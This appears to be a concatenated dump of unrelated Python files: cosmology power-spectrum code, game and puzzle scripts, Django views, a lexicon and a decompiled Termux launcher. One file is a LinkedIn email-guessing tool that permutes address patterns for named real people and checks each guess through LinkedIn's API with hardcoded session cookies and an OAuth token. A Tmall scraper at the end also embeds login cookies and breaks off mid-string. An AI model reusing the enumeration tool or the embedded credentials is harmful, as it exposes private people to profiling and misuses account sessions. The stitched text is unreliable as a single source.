for the spin0 and spin2 case it is a bit ugly as we have to deal with healpix convention.
Our convention for spectra is: ['TT','TE','TB','ET','BT','EE','EB','BE','BB']
while healpix convention is to take alm1,alm2 and return ['TT','EE','BB','TE','EB','TB']
Parameters
----------
alm1: 1d array
the spherical harmonic transform of map1
alm2: 1d array
the spherical harmonic transform of map2
spectra: list of strings
needed for spin0 and spin2 cross correlation, the arrangement of the spectra
Return
----------
The function returns the multipole array l and cl a 1d power spectrum array or
cl_dict (for spin0 and spin2) a dictionnary of cl with entry spectra
"""
if spectra is None:
if alm2 is None:
cls = hp.sphtfunc.alm2cl(alm1)
else:
cls = hp.sphtfunc.alm2cl(alm1, alm2)
l = np.arange(len(cls))
return l, cls
cls = hp.sphtfunc.alm2cl(alm1, alm2)
l = np.arange(len(cls[0]))
""" spectra_healpix=[TT,EE,BB,TE,EB,TB] """
spectra_healpix = [spectra[0], spectra[5], spectra[8], spectra[1], spectra[6], spectra[2]]
cl_dict = {spec: cls[i] for i, spec in enumerate(spectra_healpix)}
if alm2 is None:
#here we set ET=TE, BE=EB and BT=TB
cl_dict[spectra[3]] = cl_dict[spectra[1]]
cl_dict[spectra[7]] = cl_dict[spectra[6]]
cl_dict[spectra[4]] = cl_dict[spectra[2]]
else:
#here we need to recompute cls inverting the order of the alm to get ET,BT and BE
cls = hp.sphtfunc.alm2cl(alm2, alm1)
# spectra_healpix=[TT,EE,BB,ET,BE,BT]
spectra_healpix = [spectra[0], spectra[5], spectra[8], spectra[3], spectra[7], spectra[4]]
for i, spec in enumerate(spectra_healpix):
cl_dict[spec] = cls[i]
return l, cl_dict
def get_spectra_pixell(alm1, alm2=None, spectra=None):
"""Get the power spectrum of alm1 and alm2, we use pixell.alm2cl (this is faster)
Parameters
----------
alm1: 1d array
the spherical harmonic transform of map1
alm2: 1d array
the spherical harmonic transform of map2
spectra: list of strings
needed for spin0 and spin2 cross correlation, the arrangement of the spectra
Return
----------
The function returns the multipole array l and cl a 1d power spectrum array or
cl_dict (for spin0 and spin2) a dictionnary of cl with entry spectra
"""
if spectra is None:
if alm2 is None:
cls = curvedsky.alm2cl(alm1)
else:
cls = curvedsky.alm2cl(alm1, alm2)
l = np.arange(len(cls))
return l, cls
cls = curvedsky.alm2cl(alm1[:,None], alm2[None,:])
l = np.arange(len(cls[0,0]))
cl_dict = {}
for i, l1 in enumerate(["T","E","B"]):
for j, l2 in enumerate(["T","E","B"]):
cl_dict[l1+l2] = cls[i,j]
return(l, cl_dict)
def deconvolve_mode_coupling_matrix(l, ps, inv_mode_coupling_matrix, spectra=None):
"""deconvolve the mode coupling matrix
Parameters
----------
l: 1d array
the multipoles or the location of the center of the bins
cl: 1d array or dict of 1d array
the power spectra, can be a 1d array (spin0) or a dictionnary (spin0 and spin2)
inv_mode_coupling_matrix: 2d array (or dict of 2d arrays)
the inverse of the mode coupling matrix can be binned or not
spectra: list of string
needed for spin0 and spin2 cross correlation, the arrangement of the spectra
"""
n_element = len(l)
if spectra is None:
ps = np.dot(inv_mode_coupling_matrix, ps)
else:
ps["TT"] = inv_mode_coupling_matrix["spin0xspin0"] @ ps["TT"]
for spec in ["TE", "TB"]:
ps[spec] = inv_mode_coupling_matrix["spin0xspin2"] @ ps[spec]
for spec in ["ET", "BT"]:
ps[spec] = inv_mode_coupling_matrix["spin2xspin0"] @ ps[spec]
vec = []
for spec in ["EE", "EB", "BE", "BB"]:
vec = np.append(vec, ps[spec])
vec = inv_mode_coupling_matrix["spin2xspin2"] @ vec
for i, spec in enumerate(["EE", "EB", "BE", "BB"]):
ps[spec] = vec[i * n_element:(i + 1) * n_element]
return l, ps
def bin_spectra(l, cl, binning_file, lmax, type, spectra=None, mbb_inv=None, binned_mcm=True):
"""Bin the power spectra according to a binning file and optionnaly deconvolve the (binned) mode coupling matrix
Parameters
----------
l: 1d array
the multipoles
cl: 1d array or dict of 1d array
the power spectra to bin, can be a 1d array (spin0) or a dictionnary (spin0 and spin2)
binning_file: data file
a binning file with format bin low, bin high, bin mean
lmax: int
the maximum multipole to consider
type: string
the type of binning, either bin Cl or bin Dl
spectra: list of string
needed for spin0 and spin2 cross correlation, the arrangement of the spectra
mbb_inv: 2d array
optionnaly apply the inverse of the mode coupling matrix to debiais the spectra
binned_mcm: boolean
if mbb_inv is not None, specify if it's binned or not
Return
----------
The function return the binned multipole array bin_c and a 1d power spectrum
array (or dictionnary of 1d power spectra if spectra is not None).
"""
bin_lo, bin_hi, lb, bin_size = pspy_utils.read_binning_file(binning_file, lmax)
n_bins = len(bin_hi)
# the alm2cl return cl starting at l = 0, we use spectra from l = 2
# this is due in particular to the fact that the mcm is computed only for l>=2
l = np.arange(2, lmax)
if spectra is None: cl = cl[l]
else: cl = {f: cl[f][l] for f in spectra}
if type == "Dl": fac = (l * (l + 1) / (2 * np.pi))
elif type == "Cl": fac = l * 0 + 1
# we have the option to deconvolve the l-by-l mode coupling matrix
if (mbb_inv is not None) & (binned_mcm == False):
l, cl = deconvolve_mode_coupling_matrix(l, cl, mbb_inv, spectra)
# Now the binning part
if spectra is None:
ps = np.zeros(n_bins)
for ibin in range(n_bins):
loc = np.where((l >= bin_lo[ibin]) & (l <= bin_hi[ibin]))
ps[ibin] = (cl[loc] * fac[loc]).mean()
else:
vec = []
for f in spectra:
binned_power = np.zeros(n_bins)
for ibin in range(n_bins):
loc = np.where((l >= bin_lo[ibin]) & (l <= bin_hi[ibin]))
binned_power[ibin] = (cl[f][loc] * fac[loc]).mean()
vec = np.append(vec, binned_power)
ps = vec2spec_dict(n_bins, vec, spectra)
# we have the option to deconvolve the binned mode coupling matrix
if (mbb_inv is not None) & (binned_mcm == True):
lb, ps = deconvolve_mode_coupling_matrix(lb, ps, mbb_inv, spectra)
return lb, ps
def vec2spec_dict(n_bins, vec, spectra):
"""Take a vector of power spectra and return a power spectra dictionnary.
vec should be of the form [spectra[0], spectra[1], ... ].
For example [cl_TT,cl_TE,cl_ET, ...., cl_BB]
Parameters
----------
n_bins: int
the number of bins per spectrum
vec: 1d array
an array containing a vector of spectra
spectra: list of strings
the arrangement of the spectra for example:
['TT','TE','TB','ET','BT','EE','EB','BE','BB']
"""
return {spec: vec[i * n_bins:(i + 1) * n_bins] for i, spec in enumerate(spectra)}
def write_ps(file_name, l, ps, type, spectra=None):
"""Write down the power spectra to disk.
Parameters
----------
file_name: str
the name of the file to write the spectra
l: 1d array
the multipoles (or binned multipoles)
ps: 1d array or dict of 1d array
the power spectrum, if spectra is not None, expect a dictionary with entry spectra
type: string
'Cl' or 'Dl'
spectra: list of strings
needed for spin0 and spin2 cross correlation, the arrangement of the spectra
"""
if spectra is None:
ps_list = [ps]
ps_list[0:0] = [l]
str = "l"
str += " %s"%type
ps_list = np.array(ps_list)
np.savetxt(file_name, np.transpose(ps_list), header=str)
else:
ps_list = [ps[f] for f in spectra]
ps_list[0:0] = [l]
str = "l"
for l1 in spectra:
str += " %s_%s"%(type, l1)
ps_list = np.array(ps_list)
np.savetxt(file_name, np.transpose(ps_list), header=str)
def read_ps(file_name, spectra=None):
"""Read the power spectra.
Parameters
----------
file_name: str
the name of the file to read the spectra
spectra: list of strings
needed for spin0 and spin2 cross correlation, the arrangement of the spectra
Return
----------
The function return the multipole l (or binned multipoles) and a 1d power spectrum
array or a dictionnary of power spectra (if spectra is not None).
"""
data = np.loadtxt(file_name)
if spectra is None:
return data[:, 0], data[:, 1]
l = data[:, 0]
ps = {spec: data[:, i + 1] for i, spec in enumerate(spectra)}
return l, ps
def write_ps_hdf5(file, spec_name, l, ps, spectra=None):
"""Write down the power spectra in a hdf5 file.
Parameters
----------
file: hdf5
the name of the hdf5 file
spec_name: string
the name of the group in the hdf5 file
l: 1d array
the multipoles (or binned multipoles)
ps: 1d array or dict of 1d array
the power spectrum, if spectra is not None, expect a dictionary with entry spectra
spectra: list of strings
needed for spin0 and spin2 cross correlation, the arrangement of the spectra
"""
def array_from_dict(l,ps,spectra=None):
array = []
array += [l]
if spectra == None:
array += [ps]
else:
for spec in spectra:
array += [ps[spec]]
return array
group = file.create_group(spec_name)
array = array_from_dict(l, ps, spectra=spectra)
group.create_dataset(name="data", data=array, dtype="float")
def read_ps_hdf5(file, spec_name, spectra=None):
"""Read the power spectra in a hdf5 file.
Parameters
----------
file: hdf5
the name of the hdf5 file
spec_name: string
the name of the group in the hdf5 file
spectra: list of strings
needed for spin0 and spin2 cross correlation, the arrangement of the spectra
Return
----------
The function returns the multipole l (or binned multipoles) and a 1d power spectrum
array (or a dictionnary of power spectra if spectra is not None).
"""
spec = file[spec_name]
data = np.array(spec["data"]).T
l = data[:,0]
if spectra is None:
ps = data[:, 1]
else:
ps = {spec: data[:, i + 1] for i, spec in enumerate(spectra)}
return l, ps
|
15,985 | 3d9378040ae604c475184908326dd2ef91c6837c | # If the peasant is damaged, the flowers will shrink!
def summonSoldiers():
if hero.gold >= hero.costOf("soldier"):
hero.summon("soldier")
# Define the function: commandSoldiers
def commandSoldiers():
for friend in hero.findFriends():
enemy = friend.findNearestEnemy()
if enemy and friend.type == "soldier":
hero.command(friend, "attack", enemy)
# Define the function: pickUpNearestCoin
def findBestItem(items):
bestItem = None
bestValue = 0
for item in items:
if item.value / hero.distanceTo(item) > bestValue:
bestItem = item
bestValue = item.value / hero.distanceTo(item)
return bestItem
def pickUpCoin():
items = hero.findItems()
nearestCoin = findBestItem(items)
if nearestCoin:
hero.move(nearestCoin.pos)
peasant = hero.findByType("peasant")[0]
while True:
summonSoldiers()
commandSoldiers()
pickUpCoin()
|
15,986 | 96ddc8d8b74ea03738a3f7355bc8b0b096a9472e | import fractions
from algebra import cancel
from integer import digitsToNumber
for i in range(10,99) :
for j in range(i + 1, 100) :
if i % 10 and j % 10 :
f = cancel(list(str(i)), list(str(j)))
f0 = digitsToNumber(f[0])
f1 = digitsToNumber(f[1])
if 0 < f0 < 10 and 0 < f1 < 10 :
if fractions.Fraction(f0, f1) == fractions.Fraction(i, j) :
print (i, j) |
15,987 | e24b50cdb48c29e24a3e387efcf4f5650677e2d8 | # uncompyle6 version 3.7.3
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.16 (default, Oct 10 2019, 22:02:15)
# [GCC 8.3.0]
# Embedded file name: o.py
# Compiled at: 2020-08-22 12:50:28
import os, sys, time
from time import sleep
os.system('clear')
os.system('xdg-open https://m.youtube.com/channel/UCSqjFOkS5_2bEP9WW24pnLA')
sleep(5)
print '\x1b[1;37m\xe2\x97\x80\x1b[1;36m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\x1b[1;37m\xe2\x96\xb6'
print '\x1b[1;37m[\x1b[1;32m1\x1b[1;37m]\x1b[1;33mLogin SC'
print '\x1b[1;37m[\x1b[1;32m2\x1b[1;37m]\x1b[1;33minstall bahan dulu'
print '\x1b[1;37m[\x1b[1;32m0\x1b[1;37m]\x1b[1;31mexit'
pil = raw_input('\x1b[1;33mPilih > \x1b[1;32m')
if pil == '1':
os.chdir('X')
os.system('python2 a.py')
elif pil == '2':
os.system('clear')
print '\x1b[1;33mInstalling...'
sleep(2)
os.system('pkg install figlet ruby -y')
os.system('gem install lolcat')
os.system('clear')
print '\x1b[1;32mBahan Terinstall'
fil = raw_input('\x1b[1;33mTekan Enter untuk login sc : ')
if fil == '':
os.chdir('X')
os.system('python2 a.py')
elif pil == '0':
sys.exit()
# okay decompiling run.pyc
|
15,988 | 8ca95f043239a5b432b102d6b80289d02c16baf9 | num1=3
num2=4
num3=5
if(num1>num2) and (num1>num3):
largest=num1
elif(num2>num1) and (num2>num3):
largest=num2
else:
largest=num3
print("",largest)
|
15,989 | 06dae6f0c45d56086378e9db047603ede9ca20b7 | from django.shortcuts import redirect, render
from .models import Versao
def home(request):
nome='sobre'
return render(request, 'logicgirl/sobre.html', {'nome':nome})
def sugestao(request):
nome='avaliacao'
return render(request, 'logicgirl/sugestao.html', {'nome':nome})
def reverter(lista):
saida=[]
for i in lista:
saida.insert(0,i)
return saida
def downloads(request):
nome='downloads'
versoes = reverter(Versao.objects.all())
return render(request, 'logicgirl/downloads.html', {'nome':nome,'versoes':versoes})
def equipe(request):
nome='equipe'
return render(request, 'logicgirl/equipe.html', {'nome':nome})
def sobre(request):
return redirect('home')
def baixar(request,id):
if Versao.objects.filter(pk=id):
baixar = Versao.objects.get(pk=id)
baixar.qtd_down+=1
baixar.save()
return redirect(baixar.arq)
else:
return redirect("downloads") |
15,990 | 6a03616863c333d974b023593977105a142c9207 | class lexicon(object):
def __init__(self):
self.words = []
def __isDirection__(self, word):
"""
Check if the given word is a direction. Return True in case it is together with the tuple('direction', value)
:param word:
:returns tuple('direction', value) as first parameter followed by the second parameter boolean True/False
based on the word type.
"""
self.directions = ('north', 'south', 'east', 'west', 'down', 'up', 'left', 'right', 'back')
for direction in self.directions:
if direction == word:
return ('direction', word), True
return None, False
def __isVerb__(self, word):
"""
Check if the given word is a verb. Return True in case it is together with the tuple('verb', value)
:param word:
:returns tuple('verb', value) as first parameter followed by the second parameter boolean True/False
based on the word type.
"""
self.verbs = ('go', 'stop', 'kill', 'eat')
for verb in self.verbs:
if verb == word:
return ('verb', word), True
return None, False
def __isStopWord__(self, word):
"""
Check if the given word is a stop word. Return True in case it is together with the tuple('stop', value)
:param word:
:returns tuple('stop', value) as first parameter followed by the second parameter boolean True/False
based on the word type.
"""
self.stopWords = ('the', 'in', 'of', 'from', 'at', 'it')
for stopWord in self.stopWords:
if stopWord == word:
return ('stop', word), True
return None, False
def __isNoun__(self, word):
"""
Check if the given word is a noun. Return True in case it is together with the tuple('noun', value)
:param word:
:returns tuple('noun', value) as first parameter followed by the second parameter boolean True/False
based on the word type.
"""
self.nouns = ('door', 'bear', 'princess', 'cabinet')
for noun in self.nouns:
if noun == word:
return ('noun', word), True
return None, False
def __isNumber__(self, word):
"""
Check if the given word is a number. Return True in case it is together with the tuple('number', value)
:param word:
:returns tuple('number', value) as first parameter followed by the second parameter boolean True/False
based on the word type.
"""
try:
return ('number', int(word)), True
except ValueError:
return None, False
def __check_word__(self, word):
"""
Check if the word is a direction, verb, stop word, noun or number and return the correct tuple (Type, Value)
:param word:
:return:
"""
self.directionValue, self.isDirection = self.__isDirection__(word.lower())
self.verbValue, self.isVerb = self.__isVerb__(word.lower())
self.stopValue, self.isStop = self.__isStopWord__(word.lower())
self.nounValue, self.isNoun = self.__isNoun__(word.lower())
self.numberValue, self.isNumber = self.__isNumber__(word.lower())
if self.isDirection:
return self.directionValue
elif self.isVerb:
return self.verbValue
elif self.isStop:
return self.stopValue
elif self.isNoun:
return self.nounValue
elif self.isNumber:
return self.numberValue
else:
return ('error', word)
def scan(self, message):
"""
Split the given message into words. Return an array of tuples with (TYPE, WORD)
:param message:
:return tuple [(TYPE, WORD),(TYPE, WORD)]:
"""
words = message.split(" ")
for word in words:
self.words.append(self.__check_word__(word))
return self.words
def scan(message):
"""
function that uses object lexicon
:param message:
:return:
"""
analyze = lexicon()
return analyze.scan(message=message)
# ----------------------- option 2 with no classes ---------------------------------------------
def isNumber(word):
"""
function that checks if a word is a number or not
:param word:
:return:
"""
try:
int(word)
return True
except ValueError:
return False
def getType(word):
"""
Function that checks the type of a word based on a dictionary
:param word:
:return:
"""
rules = {
'direction': ['north', 'south', 'east', 'west', 'down', 'up', 'left', 'right', 'back'],
'verb': ['go', 'stop', 'kill', 'eat'],
'stop': ['the', 'in', 'of', 'from', 'at', 'it'],
'noun': ['door', 'bear', 'princess', 'cabinet']
}
if isNumber(word):
return 'number'
for rule, rule_list in rules.items():
if word in rule_list:
return rule
return 'error'
def scan_dictionary_option(message):
"""
A second version of scan function that uses a dictionary to determine the type
:param message:
:return:
"""
returnValue = []
words = message.split(' ')
for word in words:
type = getType(word.lower())
returnValue.append((type, word))
return returnValue |
15,991 | c6df8803e40e95497d46a920b3641fdb074698b5 | from core.node import Node
class Constant(Node):
def __init__(self, val):
super().__init__()
self.value = val
def perform(self):
return self.value
def derivative(self, wrt):
return 0
def toString(self):
return str(self.value) |
15,992 | 51a8c294bb72efce2ea30575c98eaf79d65117fb | bufA = input()
count_word = 1
if bufA == "": #입력이 없으면 0를 출력
print(0)
else:
for i in bufA:
if i == " ": #공백문자를 계산
count_word += 1
if bufA[-1] == " ": #마지막 글자가 공백이라면
count_word -= 1
if bufA[0] == " ": #첫 글자가 공백이라면
count_word -= 1
print(count_word)
|
15,993 | f3b1ccbca2800a8d61659e6e5027088fcde37dcb | /home/jlin246/anaconda3/lib/python3.6/codecs.py |
15,994 | fd3828ae9c68715b3e507d2cc6d0064abc151be8 | import subprocess
curl_auth_URL = '''
curl 'https://www.linkedin.com/uas/js/authuserspace?v=0.0.1191-RC8.56523-1429&api_key=4XZcfCb3djUl-DHJSFYd1l0ULtgSPl9sXXNGbTKT2e003WAeT6c2AqayNTIN5T1s&credentialsCookie=true' -H 'Accept-Encoding: gzip, deflate, sdch, br' -H 'Accept-Language: en-US,en;q=0.8' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36' -H 'Accept: */*' -H 'Referer: https://mail.google.com/mail/u/0/' -H 'Cookie: visit="v=1&M"; wutan=3tuIE4NFg+anLVR45/FRML6KkQZZREJ7voNVKBn5XwM=; bcookie="v=2&5119d04a-4d67-4d0f-8348-ac41c6529628"; bscookie="v=1&20160609204657aaeeccfd-80ab-4d70-80a0-cbb2736bed8eAQHhp-6ERxAp7k5vFJhfyGPoiYlBtxJ4"; _cb_ls=1; _chartbeat2=TZ1XNDgkXfwgrzHC.1465612818216.1466547387325.100101000001; oz_props_fetch_size1_112650289=15; share_setting=PUBLIC; sdsc=1%3A1SZM1shxDNbLt36wZwCgPgvN58iw%3D; _lipt=0_eXhgZe72hwJ1ACrCXPhsS-BdeFMrt54s5y8J_u6z8dzUxuf2h_YiYxmpomBbH-j5GxlEiquAYXl0GjOOBEqM3Bq_3Hi3HdpKqdeiuqMHz5h6CewjOlqYL9Qv3ejiVksrfRO1HnNsQ3vR_o0bKyts22tnnJkCZz7v1wGBmMVZmMpM7qwcXNsxZ3IMdxGqtFCJeNmC4SJGjzpxiWYPVGcE5dHsrhvqegaMtZ2s9dxg7gampby-4WXXuawXOcEJpJPmHD3yihk2-Snwob0GYdK1jMhQwJLxcE7WABN-Z_0z5MVzDSWNj5DScvLw1apCBPghb-ERr7LgtKmUV7ZUYMRhsXXpNcFXKU2FZzvIrRktts-; _ga=GA1.2.785583338.1465937479; lang="v=2&lang=en-us&c="; li_at=AQEDAQa26DEEU7yZAAABVVRR4zoAAAFVeryi4U0Ax6HKjV6DVd1MvPxJGttc4l48nYxa96oVVtytSm9pABwDDEJOk4oCqH_K2w17c5c-HdU5MhWFfLYCu9qcSdzadzddHTk5qru3fNUR6UcWRJDdBKAv; liap=true; sl="v=1&7dzNj"; JSESSIONID="ajax:1898019488492729741"; lidc="b=LB89:g=357:u=181:i=1466637083:t=1466715123:s=AQEs-9w5sEyrnjA_QAFN9SCQxeKHkE5H"' -H 'Connection: keep-alive' --compressed
'''
curl_profile_URL = '''
curl 'https://api.linkedin.com/v1/people/email={0}%40{1}:(first-name,last-name,headline,location,distance,positions,twitter-accounts,im-accounts,phone-numbers,member-url-resources,picture-urls::(original),site-standard-profile-request,public-profile-url,relation-to-viewer:(connections:(person:(first-name,last-name,headline,site-standard-profile-request,picture-urls::(original)))))' -H 'Cookie: bcookie="v=2&5119d04a-4d67-4d0f-8348-ac41c6529628"; sdsc=1%3A1SZM1shxDNbLt36wZwCgPgvN58iw%3D; _lipt=0_eXhgZe72hwJ1ACrCXPhsS-BdeFMrt54s5y8J_u6z8dzUxuf2h_YiYxmpomBbH-j5GxlEiquAYXl0GjOOBEqM3Bq_3Hi3HdpKqdeiuqMHz5h6CewjOlqYL9Qv3ejiVksrfRO1HnNsQ3vR_o0bKyts22tnnJkCZz7v1wGBmMVZmMpM7qwcXNsxZ3IMdxGqtFCJeNmC4SJGjzpxiWYPVGcE5dHsrhvqegaMtZ2s9dxg7gampby-4WXXuawXOcEJpJPmHD3yihk2-Snwob0GYdK1jMhQwJLxcE7WABN-Z_0z5MVzDSWNj5DScvLw1apCBPghb-ERr7LgtKmUV7ZUYMRhsXXpNcFXKU2FZzvIrRktts-; _ga=GA1.2.785583338.1465937479; lang="v=2&lang=en-us&c="; liap=true; lidc="b=LB89:g=357:u=181:i=1466635831:t=1466715123:s=AQH5lo0WCPxkRJs4xxddhuYc__WN3Xh4"' -H 'X-Cross-Domain-Origin: https://mail.google.com' -H 'Accept-Encoding: gzip, deflate, sdch, br' -H 'Accept-Language: en-US,en;q=0.8' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36' -H 'Content-type: application/json' -H 'Accept: */*' -H 'Referer: https://api.linkedin.com/uas/js/xdrpc.html?v=0.0.1191-RC8.56523-1429' -H 'X-Requested-With: IN.XDCall' -H 'x-li-format: json' -H 'Connection: keep-alive' -H 'oauth_token: {2}' -H 'X-HTTP-Method-Override: GET' --compressed
'''
string_formats = '''
{first_name}@{domain}
{last_name}@{domain}
{first_name}{last_name}@{domain}
{first_name}.{last_name}@{domain}
{f_initial}{last_name}@{domain}
{f_initial}.{last_name}@{domain}
{first_name}{l_initial}@{domain}
{first_name}.{l_initial}@{domain}
{f_initial}{l_initial}@{domain}
{f_initial}.{l_initial}@{domain}
{last_name}{first_name}@{domain}
{last_name}.{first_name}@{domain}
{last_name}{f_initial}@{domain}
{last_name}.{f_initial}@{domain}
{l_initial}{first_name}@{domain}
{l_initial}.{first_name}@{domain}
{l_initial}{f_initial}@{domain}
{l_initial}.{f_initial}@{domain}
{f_initial}{last_name}@{domain}
{f_initial}.{last_name}@{domain}
{first_name}{last_name}@{domain}
{first_name}..{last_name}@{domain}
{first_name}{last_name}@{domain}
{first_name}..{last_name}@{domain}
{first_name}-{last_name}@{domain}
{f_initial}-{last_name}@{domain}
{first_name}-{l_initial}@{domain}
{f_initial}-{l_initial}@{domain}
{last_name}-{first_name}@{domain}
{last_name}-{f_initial}@{domain}
{l_initial}-{first_name}@{domain}
{l_initial}-{f_initial}@{domain}
{f_initial}-{last_name}@{domain}
{first_name}--{last_name}@{domain}
{first_name}--{last_name}@{domain}
{first_name}_{last_name}@{domain}
{f_initial}_{last_name}@{domain}
{first_name}_{l_initial}@{domain}
{f_initial}_{l_initial}@{domain}
{last_name}_{first_name}@{domain}
{last_name}_{f_initial}@{domain}
{l_initial}_{first_name}@{domain}
{l_initial}_{f_initial}@{domain}
{f_initial}_{last_name}@{domain}
{first_name}__{last_name}@{domain}
{first_name}__{last_name}@{domain}
'''
def curl_this(url):
'''
I: string, prepended by 'curl'
O: output string of curl
'''
stor = subprocess.Popen(
url,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
).communicate()
return stor
def parse_auth_token(curled_output):
#build regex or something to parse this
if curled_output[0] != '':
cut_off_front = curled_output[0].split('l.oauth_token =')[1]
cut_off_back = cut_off_front.split(';')[0]
auth_token_str = cut_off_back.strip().strip('\"')
else:
print output[1]
return None
return auth_token_str
def get_auth_token(URL):
return parse_auth_token(curl_this(URL))
def get_profile_from_LI(user_handle, domain, auth_token):
profile = curl_this(curl_profile_URL.format(user_handle, domain, auth_token))
return profile
def check_LI_profile_exist(user_handle, domain, auth_token):
#hacky ass way to this
output_str = get_profile_from_LI(user_handle,domain, auth_token)
#put an if clause and parse out the messsage.
#it's the token call this same function again.
# print output_str[0], type(output_str[0]), ("errorCode" not in output_str[0])
some_output_string = output_str[0]
if '''"errorCode": 0,''' in some_output_string:
raise exception('auth error')
return ('''"errorCode"''' not in some_output_string)
#I, O first name, last name, domain
def permuter(first_name, last_name, domain):
disc = {
'first_name': first_name,
'last_name': last_name,
'f_initial': first_name[0],
'l_initial': last_name[0],
'domain': domain,
}
emails = [template.format(**disc).strip() for template in string_formats.split('\n')]
return emails[1:-1]
def email_checker(first_name, last_name, domain):
# it's not very fast so lets multithread
auth_token = get_auth_token(curl_auth_URL)
# print auth_token
#auth_token = "CwvLIj55Ne3EZw9HTE6SX7fKv2g5mnfdYnnL"
list_of_emails = permuter(first_name, last_name, domain)
output = []
for email in list_of_emails:
user_handle, domain = email.split('@')
boolean = check_LI_profile_exist(user_handle, domain, auth_token)
output.append((email, boolean))
return output
if __name__ == '__main__':
# ('joe','choti', 'mlb.com'),
# ('laura', 'kang', 'sendence.com'),
# ('rasmus', "wissmann", 'oscarhealth.com'),
# ('paolo', 'esquivel', 'truveris.com'),
# ('carl', 'anderson', 'wework.com'),
# ('carl', 'vogel', 'warbyparker.com'),
# ('max', 'shron', 'warbyparker.com'),
# some_list = [
# ('Debbie', 'Chung', 'gilt.com'),
# ('Igor', 'Elbert', 'gilt.com'),
# ('asharma','567567', 'gmail.com'),
# ('claudia', 'perlich', 'dstillery.com'),
# ('brian', 'dalessandro', 'zocdoc.com'),
# ('jeffrey', 'picard', 'contently.com'),
# ]
# str_lis = '''
# Eric Xu Outbrain.com
# Samer Zaben Vimeo.com
# Steve Wood Squarespace.com
# Brad Willard Squarespace.com
# David Llanos Gallup.com
# Anuradha Uduwage Gallup.com
# Peter Edwards Zillow.com
# John Wiley Zillow.com
# Shawn LeMone ASCAP.com
# Mark Katz ASCAP.com
# Sarah Bloomquist ASCAP.com
# David Frigeri ASCAP.com
# Alex Kass digitalocean.com
# Courtney Epstein zocdoc.com
# brian dalessandro zocdoc.com
# Dan Becker datarobot.com
# Satadru Sengupta datarobot.com
# xavier datarobot.com
# Srikesh Arunajadai Celmatix.com
# Bob Sohval securityscorecard.io
# ppoh securityscorecard.io
# Richard Williams makerbot.com
# Russell Kummer makerbot.com
# Alexandra Marvar makerbot.com
# Jack Thompson makerbot.com
# Jonathan Taqqu intentmedia.com
# careers sendence.com
# Laura sendence.com
# '''
'''
brian@zocdoc.com
EXu@Outbrain.com
'''
str_lis = '''
a sharma567567 gmail.com
max shron warbyparker.com
'''
some_list = [tuple(item.strip('\t').split()) for item in str_lis.split('\n') if item != '']
for args in some_list:
try:
filtered_for_positives = [email for email in email_checker(*args) if email[1]]
if filtered_for_positives:
print '\n'.join(map(str,filtered_for_positives[::-1]))
else:
print None
except:
print args |
15,995 | 77ef4bda8fa7b0148a30d51267800e0978d06b4f | import torch
import numpy as np
def Interlace(inp,intermediate,scale):
if (inp.shape[1]!=intermediate.shape[1]):
print('Wrong Dimensions')
return 0
else:
if repr(type(inp[8:8+5])) == 'torch':
output=torch.Tensor(inp.shape[0]+intermediate.shape[0],inp.shape[1])
else:
output=np.zeros((inp.shape[0]+intermediate.shape[0],inp.shape[1]))
for i in range(0,inp.shape[0]-1):
output[int(i*scale),:]=inp[i,:]
output[int(i*scale+1):int((i+1)*scale),:]=intermediate[int(i*(scale-1)):int((i+1)*(scale-1)),:]
output[-1,:]=inp[-1,:]
return output
|
15,996 | a3c3a2163f30f3cea8400c359b8a679c0a7463ec | import random
import re
import time
import requests
from lxml import etree
from selenium import webdriver
headers = {
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"accept-encoding": "gzip, deflate, br",
"accept-language": "zh-CN,zh;q=0.9",
"cache-control": "max-age=0",
"cookie": "cna=gY5E8vPMGACASvgLWesBpgg; _med=dw:1440&dh:900&pw:1440&ph:900&ist:0; l=bBgQUK1lvHlc2bE_BOCg5uI81fb9kIRPguPRwGoei_5Q-1T-JB_OlkIbwe96Vj5P9bYB4R3ZAF9teFmT8PsV.; sm4=110100; enc=xzqpgSiaHaMOi%2BHzY%2BcQ8xIJ6jeSOrGpaJQ3yJ2MJm22hbDyWWnk1saajEjzUU5PAmCn0Kvw4fr%2FIX%2F6FkAhoA%3D%3D; _uab_collina=155187561517221955690883; lid=%E6%8F%90%E6%96%AF%E6%8B%89%E7%88%B8%E7%88%B8; tk_trace=1; t=a3e60ff03b942db42bf59b62b90443e5; _tb_token_=31be3e73997e5; cookie2=1b8f21a5c9e506e84e656d60295a13a5; cq=ccp%3D0; _m_h5_tk=2b2e6ca1faf3b9ef51840702c02623a2_1552193233241; _m_h5_tk_enc=14e720156a77f0f3f7de9aebce6942d4; hng=""; uc1=cookie21=V32FPkk%2FhSg%2F&cookie15=V32FPkk%2Fw0dUvg%3D%3D&cookie14=UoTZ5iTH1XrsOA%3D%3D; uc3=vt3=F8dByEvz0Szpp1DisBo%3D&id2=UUphyu7opSokkbNd8Q%3D%3D&nk2=r7Qc2M7TAvy3RA%3D%3D&lg2=URm48syIIVrSKA%3D%3D; tracknick=%5Cu63D0%5Cu65AF%5Cu62C9%5Cu7238%5Cu7238; _l_g_=Ug%3D%3D; ck1=""; unb=2200733418885; lgc=%5Cu63D0%5Cu65AF%5Cu62C9%5Cu7238%5Cu7238; cookie1=W80vOuO9AY8m2yPvjGw2CQE%2B%2Bjh7a7z5PnzPvOgtEs0%3D; login=true; cookie17=UUphyu7opSokkbNd8Q%3D%3D; _nk_=%5Cu63D0%5Cu65AF%5Cu62C9%5Cu7238%5Cu7238; uss=""; csg=43d8c04e; skt=5b8c3cc2a083a8a4; tt=tmall-main; 